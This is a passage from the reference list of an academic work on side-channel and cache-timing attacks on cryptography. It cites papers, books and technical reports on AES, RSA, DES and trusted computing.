[18] J. Bonneau and I. Mironov. Cache-Collision Timing Attacks against AES.
Cryptographic Hardware and Embedded Systems — CHES 2006, L. Goubin
and M. Matsui, editors, pages 201-215, Springer-Verlag, Lecture Notes in
Computer Science series 4249, 2006.
[19] E. Brickell, G. Graunke, M. Neve, J.-P. Seifert. Software mitigations to hedge
AES against cache-based software side channel vulnerabilities. Cryptology
ePrint Archive, Report 2006/052, February 2006.
[20] R. H. Brown, M. L. Good, A. Prabhakar. Data Encryption Standard (DES)
(FIPS 46-2). Federal Information Processing Standards Publication (FIPS),
Dec 1993. Available at: http://www.itl.nist.gov/fipspubs/fip46-2.html
(initial version from Jan 15, 1977).
[21] D. Brumley and D. Boneh. Remote Timing Attacks are Practical. Proceedings of the 12th Usenix Security Symposium, pages 1-14, 2003.
[22] D. Burger, T. M. Austin, and S. Bennett. Evaluating future microprocessors:
The simplescalar tool set. Technical Report CS-TR-1996-1308, 1996.
155
[23] B. Canvel, A. Hiltgen, S. Vaudenay, M. Vuagnoux. Password Interception
in a SSL/TSL Channel. Advances in Cryptology - CRYPTO ’03, D. Boneh,
editor, pages 583-599, Springer-Verlag, Lecture Notes in Computer Science
series 2729, 2003.
[24] S. Chari, J. R. Rao, P. Rohatgi. Template Attacks. Cryptographic Hardware
and Embedded Systems — CHES 2002, B. S. Kaliski Jr, Ç. K. Koç, and
C. Paar, editors, pages 13-28, Springer-Verlag, Lecture Notes in Computer
Science series 2523, 2003.
[25] Y. Chen, P. England, M. Peinado, and B. Willman. High Assurance Computing on Open Hardware Architectures. Technical Report, MSR-TR-2003-20,
17 pages, Microsoft Corporation, March 2003. Available at:
ftp://ftp.research.microsoft.com/pub/tr/tr-2003-20.ps
[26] B. Chevallier-Mames, M. Ciet, and M. Joye. Low-cost solutions for preventing simple side-channel analysis: side-channel atomicity. IEEE Transactions
on Computers, volume 53, issue 6, pages 760-768, June 2004.
[27] D. Coppersmith. Small Solutions to Polynomial Equations, and Low Exponent RSA Vulnerabilities. Journal of Cryptology, volume 10, issue 4, pages
233-260, 1997.
[28] J.-S. Coron, D. Naccache, and P. Kocher. Statistics and Secret Leakage.
ACM Transactions on Embedded Computing Systems, volume 3, issue 3,
pages 492-508, August 2004.
[29] S. C. Coutinho. The Mathematics of Ciphers: Number Theory and RSA
Cryptography. AK Peters, 1998.
[30] Cryptographic
Key
Length
http://www.keylength.com
Recommendation.
Available
at:
[31] J. Daemen, V. Rijmen. The Design of Rijndael: AES - The Advanced Encryption Standard. Springer-Verlag, 2002.
[32] Department of Defence. Trusted Computing System Evaluation Criteria (Orange Book). DoD 5200.28-STD, 1985.
[33] R. C. Detmer. Introduction to 80X86 Assembly Language and Computer
Architecture. Jones & Bartlett Publishers, 2001.
[34] J.-F. Dhem, F. Koeune, P.-A. Leroux, P.-A. Mestré, J.-J. Quisquater, J.-L.
Willems. A Practical Implementation of the Timing Attack. Smart Card –
Research and Applications, J.-J. Quisquater and B. Schneier, editors, pages
156
175-191, Springer-Verlag, Lecture Notes in Computer Science series 1820,
2000.
[35] P. England, B. Lampson, J. Manferdelli, M. Peinado, and B. Willman. A
Trusted Open Platform. IEEE Computer, volume 36, issue 7, pages 55-62,
July 2003.
[36] W. Feller. Introduction to Probability Theory and Its Applications (Volume
1). 3rd edition, revised printing, New York, Wiley, 1970.
[37] K. Gandolfi, C. Mourtel, F. Olivier. Electromagnetic Analysis: Concrete
Results. Cryptographic Hardware and Embedded Systems — CHES 2001, Ç.
K. Koç, D. Naccache, and C. Paar, editors, pages 251-261, Springer-Verlag,
Lecture Notes in Computer Science series 2162, 2001.
[38] P. Gänssler, W. Stute: Wahrscheinlichkeitstheorie. Springer, Berlin 1977.
[39] P. Genua. A Cache Primer. Technical Report, Freescale Semiconductor Inc.,
16 pages, 2004. Available at:
http://www.freescale.com/files/32bit/doc/app note/AN2663.pdf
[40] GNU Project: GMP:
http://www.swox.com/gmp/.
[41] S. Gochman, R. Ronen, I. Anati, A. Berkovits, T. Kurts, A. Naveh, A. Saeed,
Z. Sperber, and R. Valentine. The Intel Pentium M Processor: Microarchitecture and performance. Intel Technology Journal, volume 7, issue 2, May
2003.
[42] D. Grawrock. The Intel Safer Computing Initiative: Building Blocks for
Trusted Computing, Intel Press, 2006.
[43] J. Handy. The Cache Memory Book. 2nd edition, Morgan Kaufmann, 1998.
[44] A. Hevia and M. Kiwi. Strength of Two Data Encryption Standard Implementations under Timing Attacks. ACM Transactions on Information and
System Security — TISSEC, volume 4, issue 2, pages 416-437, November
1999.
[45] F. H. Hinsley, A. Stripp. Code Breakers Oxford University Press, 1993.
[46] History of Computer Security Project: Early Papers. National Institute of
Standards and Technology (NIST), Computer Security Division: Computer
Security Resource Center.
Available at: http://csrc.nist.gov/publications/history/index.html
157
[47] N. A. Howgrave-Graham and N. P. Smart. Lattice Attacks on Digital Signature Schemes. Design, Codes and Cryptography, Volume 23, pages 283-290,
2001.
[48] W. M. Hu. Lattice scheduling and covert channels. Proceedings of the IEEE
Symposium on Security and Privacy, pages 52-61, IEEE Computer Society,
1992.
[49] M. Joye and P. Paillier. How to Use RSA; or How to Improve the Efficiency
of RSA without Loosing its Security. ISSE 2002, U. Schulte, Ed., Paris,
France, October 2–4, 2002
[50] M. Joye, J.-J. Quisquater, and T. Takagi. How to Choose Secret Parameters for RSA-Type Cryptosystems over Elliptic Curves. Designs, Codes and
Cryptography, volume 23, issue 3, pages 297-316, 2001.
[51] M. Joye and K. Villegas. A protected division algorithm. Smart Card Research and Advanced Applications — CARDIS 2002, P. Honeyman, editor,
pages 69-74, Usenix Association, 2002.
[52] M. Joye and S.-M. Yen. The Montgomery powering ladder. Cryptographic
Hardware and Embedded Systems — CHES 2002, B. S. Kaliski Jr, Ç. K.
Koç, and C. Paar, editors, pages 291-302, Springer-Verlag, Lecture Notes in
Computer Science series 2523, 2003.
[53] H. Kahl. SPA-based attack against the modular reduction within a partially secured RSA-CRT implementation. Cryptology ePrint Archive, Report
2004/197, 2004.
[54] J. Kelsey, B. Schneier, D. Wagner, C. Hall. Side Channel Cryptanalysis of
Product Ciphers. Journal of Computer Security, volume 8, pages 141-158,
2000.
[55] N. S. Kim, T. Austin, T. Mudge, and D. Grunwald. Challenges for architectural level power modeling. Power-Aware Computing, R. Melhem and
R.Graybill, editors, 2001.
[56] N. Koblitz. A Course in Number Theory and Cryptography (Graduate Texts
in Mathematics). Springer, 1994
[57] Ç. K. Koç. High-Speed RSA Implementation. TR 201, RSA Laboratories,
73 pages, November 1994.
[58] Ç. K. Koç. RSA Hardware Implementation. TR 801, RSA Laboratories, 30
pages, April 1996.
158
[59] P. C. Kocher. Timing Attacks on Implementations of Diffie–Hellman, RSA,
DSS, and Other Systems. Advances in Cryptology - CRYPTO ’96, N.
Koblitz, editor, pages 104-113, Springer-Verlag, Lecture Notes in Computer
Science series 1109, 1996.
[60] P. C. Kocher, J. Jaffe, B. Jun. Differential Power Analysis. Advances in
Cryptology - CRYPTO ’99, M. Wiener, editor, pages 388-397, SpringerVerlag, Lecture Notes in Computer Science series 1666, 1999.
[61] F. Koeune, J. J. Quisquater. A Timing Attack against Rijndael. Technical
Report CG-1999/1, June 1999.
[62] C. Lauradoux. Collision attacks on processors with cache and countermeasures. Western European Workshop on Research in Cryptology — WEWoRC
2005, C. Wolf, S. Lucks, and P.-W. Yau, editors, pages 76-85, 2005.
[63] M. Matsui. New Block Encryption Algorithm MISTY. Proceedings of the 4th
International Workshop on Fast Software Encryption, G. Goos, J. Hartmanis
and J. van Leeuwen, editors, pages 54-68, Springer-Verlag, Lecture Notes in
Computer Science series 1267, 1997.
[64] A. J. Menezes, P. van Oorschot, and S. Vanstone. Handbook of Applied Cryptography. CRC Press, New York, 1997.
[65] M. Milenkovic, A. Milenkovic, and J. Kulick. Microbenchmarks for Determining Branch Predictor Organization. Software Practice & Experience, volume 34, issue 5, pages 465-487, April 2004.
[66] M. Neve. Cache-based Vulnerabilities and SPAM Analysis. Ph.D. Thesis,
Applied Science, UCL, July 2006
[67] M. Neve and J.-P. Seifert. Advances on Access-driven Cache Attacks on
AES. Selected Areas of Cryptography — SAC’06, to appear.
[68] M. Neve, J.-P. Seifert, Z. Wang. A refined look at Bernstein’s AES sidechannel analysis. Proceedings of ACM Symposium on Information, Computer
and Communications Security — ASIACCS’06, to appear, Taipei, Taiwan,
March 21-24, 2006.
[69] P. Q. Nguyen and I. E. Shparlinski. The Insecurity of the Digital Signature
Algorithm with Partially Known Nonces. Journal of Cryptology, Volume 15,
Issue 3, pages 151-176, Springer, 2002.
[70] P. Q. Nguyen and I. E. Shparlinski. The Insecurity of the Elliptic Curve
Digital Signature Algorithm with Partially Known Nonces. Design, Codes
and Cryptography, Volume 30, pages 201-217, 2003.
159
[71] Openssl: the open-source toolkit for ssl/tls.
Available at: http://www.openssl.org/.
[72] D. A. Osvik, A. Shamir, and E. Tromer. Other People’s Cache: Hyper Attacks on HyperThreaded Processors. Presentation available at:
http://www.wisdom.weizmann.ac.il/∼tromer/.
[73] D. A. Osvik, A. Shamir, and E. Tromer. Cache Attacks and Countermeasures: The Case of AES. Topics in Cryptology — CT-RSA 2006, The Cryptographers’ Track at the RSA Conference 2006, D. Pointcheval, editor, pages
1-20, Springer-Verlag, Lecture Notes in Computer Science series 3860, 2006
[74] R. van der Pas. Memory Hierarchy in Cache-Based Systems. Technical Report, Sun Microsystems Inc., 28 pages, 2002.
Available at: http://www.sun.com/blueprints/1102/817-0742.pdf
[75] D. Page. Theoretical Use of Cache Memory as a Cryptanalytic Side-Channel.
Technical Report CSTR-02-003, Department of Computer Science, University of Bristol, June 2002.
[76] D. Page. Defending Against Cache Based Side-Channel Attacks. Technical
Report. Department of Computer Science, University of Bristol, 2003.
[77] D. Page. Partitioned Cache Architecture as a Side Channel Defence Mechanism. Cryptography ePrint Archive, Report 2005/280, August 2005.
[78] D. Patterson and J. Hennessy. Computer Architecture: A Quantitative Approach. 4th edition, Morgan Kaufmann, 2006.
[79] S. Pearson. Trusted Computing Platforms: TCPA Technology in Context,
Prentice Hall PTR, 2002.
[80] C. Percival. Cache missing for fun and profit. BSDCan 2005, Ottawa, 2005.
Available at:
http://www.daemonology.net/hyperthreading-consideredharmful/
[81] C. P. Pfleeger and S. L. Pfleeger. Security in Computing. 3rd edition, Prentice
Hall PTR, 2002.
[82] R.L. Rivest, A. Shamir, L.M. Adleman. A Method for Obtaining Digital
Signatures and Public-key Cryptosystems. Communications of the ACM,
volume 21, pages 120-126, 1978.
[83] E. Rotenberg, S. Benett, and J. E. Smith. Trace cache: a low latency approach to high bandwidth instruction fetching.Proceedings of the 29th Annual ACM/IEEE Intl. Symposium on Microarchitecture, pages 24-34, 1996.
160
[84] RSA Laboratories. PKCS #1 v2.1: RSA Encryption Standard. June 2002.
Available at: ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1.pdf.
[85] W. Schindler. A Timing Attack against RSA with the Chinese Remainder
Theorem. Cryptographic Hardware and Embedded Systems — CHES 2000,
Ç.K. Koç and C. Paar, editors, pages 110–125, Springer-Verlag, Lecture
Notes in Computer Science series 1965, 2000.
[86] W. Schindler. Optimized Timing Attacks against Public Key Cryptosystems.
Statistics and Decisions, volume 20, pages 191-210, 2002.
[87] W. Schindler. On the Optimization of Side-Channel Attacks by Advanced
Stochastic Methods. Public Key Cryptography — PKC 2005, S. Vaudenay,
editor, pages 85-103, Springer-Verlag, Lecture Notes in Computer Science
series 3386, 2005.
[88] W. Schindler, F. Koeune, and J.-J. Quisquater. Improving Divide and Conquer Attacks Against Cryptosystems by Better Error Detection / Correction
Strategies. Cryptography and Coding — IMA 2001, B. Honary, editor, pages
245-267, Springer-Verlag, Lecture Notes in Computer Science series 2260,
2001.
[89] W. Schindler, F. Koeune, J.-J. Quisquater. Unleashing the Full Power of
Timing Attack. Technical Report CG-2001/3, Universite Catholique de Louvain, 2001.
[90] B. Schneier. Applied Cryptography: Protocols, Algorithms, and Source Code
in C. John Waley & sons, 1996
[91] T. Shanley. The Unabridged Pentium 4 :
Addison-Wesley Professional, 2004.
IA32 Processor Genealogy.
[92] J. Shen and M. Lipasti. Modern Processor Design: Fundamentals of Superscalar Processors. McGraw-Hill, 2005.
[93] A. Silberschatz, G. Gagne, and P. B. Galvin. Operating system concepts. 7th
edition, John Wiley and Sons, 2005.
[94] S. W. Smith. Trusted Computing Platforms: Design and Applications,
Springer-Verlag, 2004.
[95] O. Sibert, P. A. Porras, and R. Lindell. The Intel 80x86 Processor Architecture: Pitfalls for Secure Systems. IEEE Symposium on Security and Privacy,
pages 211-223, 1995.
161
[96] W. Stallings. Cryptography and Network Security: Principles and Practice.
3rd Edition, Prentice Hall, 2002
[97] D. R. Stinson. Cryptography: Theory and Practice. 2nd Edition, CRC Press,
2002
[98] H. C. A. van Tilborg. Encyclopedia of Cryptography and Security. Springer,
2005
[99] Trusted Computing Group, http://www.trustedcomputinggroup.org.
[100] Y. Tsunoo, T.Saito, T. Suzaki, M. Shigeri, H. Miyauchi. Cryptanalysis of
DES Implemented on Computers with Cache. Cryptographic Hardware and
Embedded Systems — CHES 2003, C. D. Walter, Ç. K. Koç, and C. Paar,
editors, pages 62-76, Springer-Verlag, Lecture Notes in Computer Science
series 2779, 2003.
[101] Y. Tsunoo, E. Tsujihara, K. Minematsu, H. Miyauchi. Cryptanalysis of
Block Ciphers Implemented on Computers with Cache. ISITA 2002, 2002.
[102] Y. Tsunoo, E. Tsujihara, M. Shigeri, H. Kubo, K. Minematsu. Improving
cache attacks by considering cipher structure. International Journal of Information Security, volume 5, issue 3, pages 166-176, Springer-Verlag, 2006.
[103] R. Uhlig, G. Neiger, D. Rodgers, A. L. Santoni, F. C. M. Martins, A. V. Anderson, S. M. Bennett, A. Kagi, F. H. Leung, L. Smith. Intel Virtualization
Technology, IEEE Computer, volume 38, issue 5, pages 48-56, May 2005.
[104] S. Vaudenay. A Classical Introduction to Cryptography: Applications for
Communications Security . Springer, 2005
[105] C. D. Walter. Montgomery Exponentiation Needs No Final Subtractions.
IEE Electronics Letters, volume 35, issue 21, pages 1831-1832, October 1999.
[106] W. Ware. Security Controls for Computer Systems. Report of Defense Science Board Task Force on Computer Security; Rand Report R609-1, The
RAND Corporation, 1970.
Download